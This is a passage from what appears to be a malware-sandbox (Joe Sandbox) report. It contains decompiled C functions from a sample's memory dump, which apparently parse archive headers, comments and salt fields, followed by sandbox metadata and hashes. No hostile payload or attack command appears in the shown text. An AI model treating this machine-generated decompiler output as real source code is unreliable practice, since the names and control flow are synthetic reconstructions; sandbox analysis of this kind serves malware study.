                                                    							 *(_t548 + 0x54) = 0;
                                                    							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
                                                    								L33:
                                                    								__eflags =  *(_t399 + 0x2204) & 0x00000002;
                                                    								_t539 = _t252;
                                                    								 *(_t548 + 0x60) = _t252;
                                                    								 *(_t548 + 0x5c) = _t252;
                                                    								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
                                                    									_t363 = E00CCCCFB();
                                                    									_t539 = _t363;
                                                    									 *(_t548 + 0x60) = _t363;
                                                    									 *(_t548 + 0x5c) = _t500;
                                                    								}
                                                    								_t253 = E00CC1983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
                                                    								asm("adc ecx, edx");
                                                    								 *((intOrPtr*)(_t399 + 0x6cc0)) = E00CC3EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
                                                    								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
                                                    								_t502 =  *(_t399 + 0x2200);
                                                    								_t257 = _t502 - 1;
                                                    								__eflags = _t257;
                                                    								if(_t257 == 0) {
                                                    									E00CCAD5E(_t399 + 0x2220);
                                                    									_t423 = 5;
                                                    									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
                                                    									_t503 = E00CCCCFB();
                                                    									 *(_t399 + 0x6ccd) = _t503 & 1;
                                                    									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
                                                    									_t432 = 1;
                                                    									 *((char*)(_t399 + 0x6cd2)) = 1;
                                                    									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
                                                    									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
                                                    									_t269 = 0;
                                                    									 *((char*)(_t399 + 0x6cd0)) = 0;
                                                    									__eflags = _t503 & 0x00000002;
                                                    									if((_t503 & 0x00000002) == 0) {
                                                    										_t504 = 0;
                                                    									} else {
                                                    										_t504 = E00CCCCFB();
                                                    										_t269 = 0;
                                                    										_t432 = 1;
                                                    									}
                                                    									 *(_t399 + 0x6cf0) = _t504;
                                                    									__eflags =  *(_t399 + 0x6ccd);
                                                    									if( *(_t399 + 0x6ccd) == 0) {
                                                    										L84:
                                                    										_t432 = _t269;
                                                    										goto L85;
                                                    									} else {
                                                    										__eflags = _t504;
                                                    										if(_t504 == 0) {
                                                    											L85:
                                                    											 *((char*)(_t399 + 0x6cd1)) = _t432;
                                                    											_t433 =  *(_t548 + 0x58);
                                                    											__eflags = _t433 |  *(_t548 + 0x54);
                                                    											if((_t433 |  *(_t548 + 0x54)) != 0) {
                                                    												E00CC2210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
                                                    											}
                                                    											goto L87;
                                                    										}
                                                    										goto L84;
                                                    									}
                                                    								} else {
                                                    									_t277 = _t257 - 1;
                                                    									__eflags = _t277;
                                                    									if(_t277 == 0) {
                                                    										L49:
                                                    										__eflags = _t502 - 2;
                                                    										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
                                                    										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
                                                    										 *(_t548 + 0x2c) = _t522;
                                                    										E00CCACC4(_t522, 0);
                                                    										_t438 = 5;
                                                    										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
                                                    										_t542 =  *(_t548 + 0x2c);
                                                    										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
                                                    										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
                                                    										 *((char*)(_t542 + 0x10f9)) = 1;
                                                    										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
                                                    										 *(_t542 + 0x1094) = E00CCCCFB();
                                                    										 *(_t542 + 0x1060) = E00CCCCFB();
                                                    										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
                                                    										__eflags = _t289;
                                                    										 *(_t542 + 0x1064) = _t502;
                                                    										 *(_t542 + 0x109a) = _t289;
                                                    										if(_t289 != 0) {
                                                    											 *(_t542 + 0x1060) = 0x7fffffff;
                                                    											 *(_t542 + 0x1064) = 0x7fffffff;
                                                    										}
                                                    										_t442 =  *(_t542 + 0x105c);
                                                    										_t525 =  *(_t542 + 0x1064);
                                                    										_t290 =  *(_t542 + 0x1058);
                                                    										_t505 =  *(_t542 + 0x1060);
                                                    										__eflags = _t442 - _t525;
                                                    										if(__eflags < 0) {
                                                    											L54:
                                                    											_t290 = _t505;
                                                    											_t442 = _t525;
                                                    											goto L55;
                                                    										} else {
                                                    											if(__eflags > 0) {
                                                    												L55:
                                                    												 *(_t542 + 0x106c) = _t442;
                                                    												 *(_t542 + 0x1068) = _t290;
                                                    												_t291 = E00CCCCFB();
                                                    												__eflags =  *(_t542 + 0x1094) & 0x00000002;
                                                    												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
                                                    												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
                                                    													E00CD158F(_t542 + 0x1040, E00CCCBFB(_t548 + 0x30), 0);
                                                    												}
                                                    												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
                                                    												__eflags =  *(_t542 + 0x1094) & 0x00000004;
                                                    												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
                                                    													 *(_t542 + 0x1070) = 2;
                                                    													 *((intOrPtr*)(_t542 + 0x1074)) = E00CCCBFB(_t548 + 0x30);
                                                    												}
                                                    												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
                                                    												_t292 = E00CCCCFB();
                                                    												 *(_t548 + 0x60) = _t292;
                                                    												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
                                                    												_t450 = (_t292 & 0x0000003f) + 0x32;
                                                    												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
                                                    												__eflags = _t450 - 0x32;
                                                    												if(_t450 != 0x32) {
                                                    													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
                                                    												}
                                                    												 *((char*)(_t542 + 0x18)) = E00CCCCFB();
                                                    												_t526 = E00CCCCFB();
                                                    												 *(_t542 + 0x10fc) = 2;
                                                    												_t295 =  *((intOrPtr*)(_t542 + 0x18));
                                                    												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
                                                    												__eflags = _t295 - 1;
                                                    												if(_t295 != 1) {
                                                    													__eflags = _t295;
                                                    													if(_t295 == 0) {
                                                    														_t178 = _t542 + 0x10fc;
                                                    														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
                                                    														__eflags =  *_t178;
                                                    													}
                                                    												} else {
                                                    													 *(_t542 + 0x10fc) = 1;
                                                    												}
                                                    												_t456 =  *(_t542 + 8);
                                                    												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
                                                    												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
                                                    												__eflags =  *(_t548 + 0x64) - 2;
                                                    												_t459 =  *(_t548 + 0x60);
                                                    												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
                                                    												if( *(_t548 + 0x64) != 2) {
                                                    													L68:
                                                    													_t302 = 0;
                                                    													__eflags = 0;
                                                    													goto L69;
                                                    												} else {
                                                    													__eflags = _t459 & 0x00000040;
                                                    													if((_t459 & 0x00000040) == 0) {
                                                    														goto L68;
                                                    													}
                                                    													_t302 = 1;
                                                    													L69:
                                                    													 *((char*)(_t542 + 0x10f0)) = _t302;
                                                    													_t304 =  *(_t542 + 0x1094) & 1;
                                                    													 *(_t542 + 0x10f1) = _t304;
                                                    													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
                                                    													asm("sbb eax, eax");
                                                    													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
                                                    													asm("sbb eax, eax");
                                                    													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
                                                    													__eflags = _t526 - 0x1fff;
                                                    													if(_t526 >= 0x1fff) {
                                                    														_t526 = 0x1fff;
                                                    													}
                                                    													E00CCCC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
                                                    													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
                                                    													_push(0x800);
                                                    													_t527 = _t542 + 0x28;
                                                    													_push(_t542 + 0x28);
                                                    													_push(_t548 - 0x2074);
                                                    													E00CD1C3B();
                                                    													_t463 =  *(_t548 + 0x58);
                                                    													_t318 = _t463 |  *(_t548 + 0x54);
                                                    													__eflags = _t463 |  *(_t548 + 0x54);
                                                    													if((_t463 |  *(_t548 + 0x54)) != 0) {
                                                    														_t318 = E00CC2210(_t399, _t509, _t548 + 0x30, _t463, _t542);
                                                    													}
                                                    													__eflags =  *(_t548 + 0x64) - 2;
                                                    													if( *(_t548 + 0x64) != 2) {
                                                    														_t319 = E00CE3E49(_t318, _t527, L"CMT");
                                                    														__eflags = _t319;
                                                    														if(_t319 == 0) {
                                                    															 *((char*)(_t399 + 0x6cce)) = 1;
                                                    														}
                                                    													} else {
                                                    														E00CC2134(_t399, _t542);
                                                    													}
                                                    													__eflags =  *(_t548 + 0x6b);
                                                    													if(__eflags != 0) {
                                                    														E00CC2021(__eflags, 0x1c, _t399 + 0x32, _t527);
                                                    													}
                                                    													L87:
                                                    													 *(_t548 + 0x64) =  *(_t548 + 0x48);
                                                    													goto L89;
                                                    												}
                                                    											}
                                                    											__eflags = _t290 - _t505;
                                                    											if(_t290 > _t505) {
                                                    												goto L55;
                                                    											}
                                                    											goto L54;
                                                    										}
                                                    									}
                                                    									_t328 = _t277 - 1;
                                                    									__eflags = _t328;
                                                    									if(_t328 == 0) {
                                                    										goto L49;
                                                    									}
                                                    									_t329 = _t328 - 1;
                                                    									__eflags = _t329;
                                                    									if(_t329 == 0) {
                                                    										_t471 = 5;
                                                    										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
                                                    										_t331 = E00CCCCFB();
                                                    										__eflags = _t331;
                                                    										if(_t331 == 0) {
                                                    											 *(_t399 + 0x2274) = E00CCCCFB() & 0x00000001;
                                                    											_t335 = E00CCCBAF(_t548 + 0x30) & 0x000000ff;
                                                    											 *(_t399 + 0x2278) = _t335;
                                                    											__eflags = _t335 - 0x18;
                                                    											if(_t335 <= 0x18) {
                                                    												E00CCCC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
                                                    												__eflags =  *(_t399 + 0x2274);
                                                    												if( *(_t399 + 0x2274) != 0) {
                                                    													_t544 = _t399 + 0x228c;
                                                    													E00CCCC5D(_t548 + 0x30, _t544, 8);
                                                    													E00CCCC5D(_t548 + 0x30, _t548 + 0x64, 4);
                                                    													E00CD0016(_t548 - 0x74);
                                                    													_push(8);
                                                    													_push(_t544);
                                                    													_push(_t548 - 0x74);
                                                    													E00CD005C();
                                                    													_push(_t548 + 8);
                                                    													E00CCFF33(_t548 - 0x74);
                                                    													_t350 = E00CE0C4A(_t548 + 0x64, _t548 + 8, 4);
                                                    													asm("sbb al, al");
                                                    													_t352 =  ~_t350 + 1;
                                                    													__eflags = _t352;
                                                    													 *(_t399 + 0x2274) = _t352;
                                                    												}
                                                    												 *((char*)(_t399 + 0x6cd4)) = 1;
                                                    												goto L87;
                                                    											}
                                                    											_push(_t335);
                                                    											_push(L"hc%u");
                                                    											L43:
                                                    											_push(0x14);
                                                    											_push(_t548);
                                                    											E00CC4092();
                                                    											E00CC403D(_t399, _t399 + 0x32, _t548);
                                                    											goto L89;
                                                    										}
                                                    										_push(_t331);
                                                    										_push(L"h%u");
                                                    										goto L43;
                                                    									}
                                                    									__eflags = _t329 == 1;
                                                    									if(_t329 == 1) {
                                                    										_t480 = 5;
                                                    										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
                                                    										 *(_t399 + 0x45c4) = E00CCCCFB() & 0x00000001;
                                                    										 *((short*)(_t399 + 0x45c6)) = 0;
                                                    										 *((char*)(_t399 + 0x45c5)) = 0;
                                                    									}
                                                    									goto L87;
                                                    								}
                                                    							}
                                                    							_t485 = E00CCCCFB();
                                                    							 *(_t548 + 0x54) = _t500;
                                                    							_t252 = 0;
                                                    							 *(_t548 + 0x58) = _t485;
                                                    							__eflags = _t500;
                                                    							if(__eflags < 0) {
                                                    								goto L33;
                                                    							}
                                                    							if(__eflags > 0) {
                                                    								goto L88;
                                                    							}
                                                    							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
                                                    							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
                                                    								goto L88;
                                                    							}
                                                    							goto L33;
                                                    						}
                                                    						E00CC20D7(_t399);
                                                    						 *((char*)(_t399 + 0x6cdc)) = 1;
                                                    						E00CC6D83(0xd01098, 3);
                                                    						__eflags =  *((char*)(_t548 + 0x6a));
                                                    						if(__eflags == 0) {
                                                    							goto L29;
                                                    						} else {
                                                    							E00CC2021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
                                                    							L6:
                                                    							 *((char*)(_t399 + 0x6cdd)) = 1;
                                                    							goto L89;
                                                    						}
                                                    					}
                                                    					L20:
                                                    					E00CC3FFC(_t399, _t500);
                                                    					goto L89;
                                                    				}
                                                    				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
                                                    				asm("adc eax, ecx");
                                                    				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
                                                    				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
                                                    					goto L18;
                                                    				} else {
                                                    					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
                                                    					 *((char*)(_t548 + 0x6a)) = 1;
                                                    					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
                                                    					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
                                                    						 *0xcf3278(_t548 + 0x18, 0x10);
                                                    						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
                                                    						__eflags = _t373 - 0x10;
                                                    						if(_t373 != 0x10) {
                                                    							goto L20;
                                                    						}
                                                    						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
                                                    						__eflags =  *((char*)(_t374 + 0x6124));
                                                    						if( *((char*)(_t374 + 0x6124)) != 0) {
                                                    							L10:
                                                    							 *(_t548 + 0x6b) = 1;
                                                    							L11:
                                                    							E00CC3E6D(_t399);
                                                    							_t534 = _t399 + 0x227c;
                                                    							_t547 = _t399 + 0x1038;
                                                    							E00CC603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
                                                    							__eflags =  *(_t399 + 0x2274);
                                                    							if( *(_t399 + 0x2274) == 0) {
                                                    								L16:
                                                    								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
                                                    								goto L19;
                                                    							} else {
                                                    								_t381 = _t399 + 0x228c;
                                                    								while(1) {
                                                    									_t383 = E00CE0C4A(_t548 + 0x28, _t381, 8);
                                                    									_t551 = _t551 + 0xc;
                                                    									__eflags = _t383;
                                                    									if(_t383 == 0) {
                                                    										goto L16;
                                                    									}
                                                    									__eflags =  *(_t548 + 0x6b);
                                                    									_t384 = _t399 + 0x32;
                                                    									_push(_t384);
                                                    									_push(_t384);
                                                    									if(__eflags != 0) {
                                                    										_push(6);
                                                    										E00CC2021(__eflags);
                                                    										 *((char*)(_t399 + 0x6cdd)) = 1;
                                                    										E00CC6D83(0xd01098, 0xb);
                                                    										goto L89;
                                                    									}
                                                    									_push(0x83);
                                                    									E00CC2021(__eflags);
                                                    									E00CCF279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
                                                    									E00CC3E6D(_t399);
                                                    									E00CC603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
                                                    									__eflags =  *(_t399 + 0x2274);
                                                    									_t381 = _t399 + 0x228c;
                                                    									if( *(_t399 + 0x2274) != 0) {
                                                    										continue;
                                                    									}
                                                    									goto L16;
                                                    								}
                                                    								goto L16;
                                                    							}
                                                    						}
                                                    						_t395 = E00CD1B63();
                                                    						 *(_t548 + 0x6b) = 0;
                                                    						__eflags = _t395;
                                                    						if(_t395 == 0) {
                                                    							goto L11;
                                                    						}
                                                    						goto L10;
                                                    					} else {
                                                    						E00CC138B(_t563, 0x7f, _t399 + 0x32);
                                                    						goto L6;
                                                    					}
                                                    				}
                                                    			}
                                                    0x00cc35cd
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35cf
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35d5
                                                    0x00cc35db
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc35db
                                                    0x00cc3579
                                                    0x00cc3585
                                                    0x00cc358c
                                                    0x00cc3591
                                                    0x00cc3595
                                                    0x00000000
                                                    0x00cc3597
                                                    0x00cc359e
                                                    0x00cc3375
                                                    0x00cc3375
                                                    0x00000000
                                                    0x00cc3375
                                                    0x00cc3595
                                                    0x00cc34b8
                                                    0x00cc34ba
                                                    0x00000000
                                                    0x00cc34ba
                                                    0x00cc3339
                                                    0x00cc333c
                                                    0x00cc333e
                                                    0x00cc3344
                                                    0x00000000
                                                    0x00cc3358
                                                    0x00cc3358
                                                    0x00cc335e
                                                    0x00cc3362
                                                    0x00cc3368
                                                    0x00cc338e
                                                    0x00cc3396
                                                    0x00cc3398
                                                    0x00cc339b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc33a1
                                                    0x00cc33a7
                                                    0x00cc33ae
                                                    0x00cc33bd
                                                    0x00cc33bd
                                                    0x00cc33c1
                                                    0x00cc33c3
                                                    0x00cc33df
                                                    0x00cc33eb
                                                    0x00cc33f7
                                                    0x00cc33fc
                                                    0x00cc3403
                                                    0x00cc3482
                                                    0x00cc3482
                                                    0x00000000
                                                    0x00cc3405
                                                    0x00cc3405
                                                    0x00cc340b
                                                    0x00cc3412
                                                    0x00cc3417
                                                    0x00cc341a
                                                    0x00cc341c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc341e
                                                    0x00cc3422
                                                    0x00cc3425
                                                    0x00cc3426
                                                    0x00cc3427
                                                    0x00cc3487
                                                    0x00cc3489
                                                    0x00cc3495
                                                    0x00cc349c
                                                    0x00000000
                                                    0x00cc349c
                                                    0x00cc3429
                                                    0x00cc342e
                                                    0x00cc343f
                                                    0x00cc3446
                                                    0x00cc346e
                                                    0x00cc3473
                                                    0x00cc347a
                                                    0x00cc3480
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3480
                                                    0x00000000
                                                    0x00cc340b
                                                    0x00cc3403
                                                    0x00cc33b0
                                                    0x00cc33b5
                                                    0x00cc33b9
                                                    0x00cc33bb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc336a
                                                    0x00cc3370
                                                    0x00000000
                                                    0x00cc3370
                                                    0x00cc3368

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_swprintf
                                                    • String ID: CMT$h%u$hc%u
                                                    • API String ID: 146138363-3282847064
                                                    • Opcode ID: 6fe2d36157a4f679001fc7458e4c52eca0f0d6d04b71d145dd98f0ef2f6ca015
                                                    • Instruction ID: b4e371493b3eaecfb67e080f6a341349a5700cbe6da2c8a11302c1ae45bad27d
                                                    • Opcode Fuzzy Hash: 6fe2d36157a4f679001fc7458e4c52eca0f0d6d04b71d145dd98f0ef2f6ca015
                                                    • Instruction Fuzzy Hash: BD32C371510384ABDF18DF74C895FE93BA5AF15300F08447EFD9A8B282DB749A49DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00CC286B(intOrPtr* __ecx, void* __eflags) {
                                                    				void* __ebp;
                                                    				unsigned int _t329;
                                                    				signed int _t334;
                                                    				void* _t335;
                                                    				void* _t337;
                                                    				signed int _t340;
                                                    				char _t354;
                                                    				signed short _t361;
                                                    				signed int _t364;
                                                    				signed int _t371;
                                                    				signed char _t374;
                                                    				signed char _t377;
                                                    				signed int _t378;
                                                    				signed int _t395;
                                                    				signed int _t396;
                                                    				signed int _t400;
                                                    				signed char _t413;
                                                    				intOrPtr _t414;
                                                    				char _t415;
                                                    				signed int _t418;
                                                    				signed int _t419;
                                                    				signed int _t424;
                                                    				signed int _t427;
                                                    				signed int _t432;
                                                    				signed short _t437;
                                                    				signed short _t442;
                                                    				unsigned int _t447;
                                                    				signed int _t450;
                                                    				signed int _t455;
                                                    				signed int _t469;
                                                    				void* _t470;
                                                    				void* _t478;
                                                    				signed char _t484;
                                                    				signed int _t488;
                                                    				signed int _t498;
                                                    				signed int _t501;
                                                    				signed int _t502;
                                                    				signed int _t503;
                                                    				intOrPtr* _t516;
                                                    				signed int _t520;
                                                    				signed int _t521;
                                                    				signed int _t533;
                                                    				signed int _t537;
                                                    				signed int _t539;
                                                    				unsigned int _t548;
                                                    				signed int _t550;
                                                    				signed int _t560;
                                                    				signed int _t562;
                                                    				signed int _t563;
                                                    				intOrPtr* _t585;
                                                    				void* _t593;
                                                    				signed int _t597;
                                                    				intOrPtr _t609;
                                                    				signed int _t612;
                                                    				signed int _t624;
                                                    				signed char _t628;
                                                    				void* _t639;
                                                    				signed char _t640;
                                                    				signed int _t643;
                                                    				unsigned int _t644;
                                                    				signed int _t647;
                                                    				signed int _t648;
                                                    				signed int _t650;
                                                    				signed int _t651;
                                                    				unsigned int _t653;
                                                    				signed int _t657;
                                                    				void* _t659;
                                                    				void* _t665;
                                                    				signed int _t668;
                                                    				signed int _t669;
                                                    				signed int _t670;
                                                    				signed int _t671;
                                                    				signed int _t672;
                                                    				void* _t673;
                                                    				signed int _t675;
                                                    				intOrPtr* _t676;
                                                    				signed int _t688;
                                                    				void* _t694;
                                                    				signed int _t695;
                                                    				signed int _t697;
                                                    				signed int _t699;
                                                    				signed int _t701;
                                                    				intOrPtr _t707;
                                                    				intOrPtr* _t708;
                                                    				intOrPtr _t718;
                                                    
                                                    				E00CDEB78(0xcf26a5, _t708);
                                                    				E00CDEC50(0x2024);
                                                    				_t516 = __ecx;
                                                    				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
                                                    				E00CCCB83(_t708 + 0x1c, __ecx);
                                                    				 *(_t708 + 0x10) = 0;
                                                    				 *((intOrPtr*)(_t708 - 4)) = 0;
                                                    				_t657 = 7;
                                                    				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
                                                    					L7:
                                                    					 *((char*)(_t708 + 0x5a)) = 0;
                                                    					L8:
                                                    					_push(_t657);
                                                    					E00CCCD8A();
                                                    					__eflags =  *(_t708 + 0x34);
                                                    					if( *(_t708 + 0x34) == 0) {
                                                    						L5:
                                                    						E00CC3FFC(_t516, _t639);
                                                    						L131:
                                                    						E00CC15FB(_t708 + 0x1c);
                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
                                                    						return  *(_t708 + 0x10);
                                                    					}
                                                    					 *(_t516 + 0x21fc) = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
                                                    					 *(_t516 + 0x220c) = 0;
                                                    					_t688 = E00CCCBAF(_t708 + 0x1c) & 0x000000ff;
                                                    					_t329 = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
                                                    					 *(_t516 + 0x2204) = _t329;
                                                    					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
                                                    					_t533 = E00CCCBC6(_t708 + 0x1c) & 0x0000ffff;
                                                    					 *(_t516 + 0x2208) = _t533;
                                                    					 *(_t516 + 0x2200) = _t688;
                                                    					__eflags = _t533 - _t657;
                                                    					if(_t533 >= _t657) {
                                                    						_t640 = 2;
                                                    						_t334 = _t688 - 0x73;
                                                    						__eflags = _t334;
                                                    						if(_t334 == 0) {
                                                    							 *(_t516 + 0x2200) = 1;
                                                    							_t688 = 1;
                                                    							__eflags = 1;
                                                    							L20:
                                                    							 *(_t516 + 0x21f4) = _t688;
                                                    							__eflags = _t688 - 0x75;
                                                    							if(_t688 == 0x75) {
                                                    								L23:
                                                    								_t335 = 6;
                                                    								L25:
                                                    								_push(_t335);
                                                    								E00CCCD8A();
                                                    								_t337 = E00CC1983(_t516,  *(_t516 + 0x2208));
                                                    								asm("adc ecx, 0x0");
                                                    								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
                                                    								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
                                                    								_t537 =  *(_t516 + 0x2200);
                                                    								 *(_t708 + 0x18) = _t537;
                                                    								_t340 = _t537 - 1;
                                                    								__eflags = _t340;
                                                    								if(_t340 == 0) {
                                                    									_t659 = _t516 + 0x2220;
                                                    									E00CCAD5E(_t659);
                                                    									_t539 = 5;
                                                    									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
                                                    									 *(_t516 + 0x2234) = E00CCCBC6(_t708 + 0x1c);
                                                    									_t640 = E00CCCBFB(_t708 + 0x1c);
                                                    									 *(_t516 + 0x2238) = _t640;
                                                    									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
                                                    									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
                                                    									_t548 =  *(_t516 + 0x2228);
                                                    									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
                                                    									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
                                                    									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
                                                    									__eflags = _t640;
                                                    									if(_t640 != 0) {
                                                    										L117:
                                                    										_t354 = 1;
                                                    										L118:
                                                    										 *((char*)(_t516 + 0x6cd0)) = _t354;
                                                    										 *(_t516 + 0x223c) = _t548 >> 0x00000001 & 0x00000001;
                                                    										_t550 = _t548 >> 0x00000004 & 0x00000001;
                                                    										__eflags = _t550;
                                                    										 *(_t516 + 0x6cd1) = _t548 >> 0x00000008 & 0x00000001;
                                                    										 *(_t516 + 0x6cd2) = _t550;
                                                    										L119:
                                                    										_t657 = 7;
                                                    										L120:
                                                    										_t361 = E00CCCCAC(_t708 + 0x1c, 0);
                                                    										__eflags =  *(_t516 + 0x21fc) - (_t361 & 0x0000ffff);
                                                    										if( *(_t516 + 0x21fc) == (_t361 & 0x0000ffff)) {
                                                    											L130:
                                                    											 *(_t708 + 0x10) =  *(_t708 + 0x34);
                                                    											goto L131;
                                                    										}
                                                    										_t364 =  *(_t516 + 0x2200);
                                                    										__eflags = _t364 - 0x79;
                                                    										if(_t364 == 0x79) {
                                                    											goto L130;
                                                    										}
                                                    										__eflags = _t364 - 0x76;
                                                    										if(_t364 == 0x76) {
                                                    											goto L130;
                                                    										}
                                                    										__eflags = _t364 - 5;
                                                    										if(_t364 != 5) {
                                                    											L128:
                                                    											 *((char*)(_t516 + 0x6cdc)) = 1;
                                                    											E00CC6D83(0xd01098, 3);
                                                    											__eflags =  *((char*)(_t708 + 0x5a));
                                                    											if(__eflags == 0) {
                                                    												goto L130;
                                                    											}
                                                    											E00CC2021(__eflags, 4, _t516 + 0x32, _t516 + 0x32);
                                                    											 *((char*)(_t516 + 0x6cdd)) = 1;
                                                    											goto L131;
                                                    										}
                                                    										__eflags =  *(_t516 + 0x45c6);
                                                    										if( *(_t516 + 0x45c6) == 0) {
                                                    											goto L128;
                                                    										}
                                                    										 *0xcf3278();
                                                    										_t371 =  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))() - _t657;
                                                    										__eflags = _t371;
                                                    										asm("sbb edx, ecx");
                                                    										 *0xcf3278(_t371, _t640, 0);
                                                    										 *((intOrPtr*)( *_t516 + 0x10))();
                                                    										 *(_t708 + 0x5b) = 1;
                                                    										do {
                                                    											_t374 = E00CC9892(_t516);
                                                    											asm("sbb al, al");
                                                    											_t377 =  !( ~_t374) &  *(_t708 + 0x5b);
                                                    											 *(_t708 + 0x5b) = _t377;
                                                    											_t657 = _t657 - 1;
                                                    											__eflags = _t657;
                                                    										} while (_t657 != 0);
                                                    										__eflags = _t377;
                                                    										if(_t377 != 0) {
                                                    											goto L130;
                                                    										}
                                                    										goto L128;
                                                    									}
                                                    									_t354 = 0;
                                                    									__eflags =  *(_t516 + 0x2234);
                                                    									if( *(_t516 + 0x2234) == 0) {
                                                    										goto L118;
                                                    									}
                                                    									goto L117;
                                                    								}
                                                    								_t378 = _t340 - 1;
                                                    								__eflags = _t378;
                                                    								if(_t378 == 0) {
                                                    									L35:
                                                    									__eflags = _t537 - 2;
                                                    									_t68 = (0 | _t537 == 0x00000002) - 1; // -1
                                                    									_t665 = (_t68 & 0x00002350) + 0x2298 + _t516;
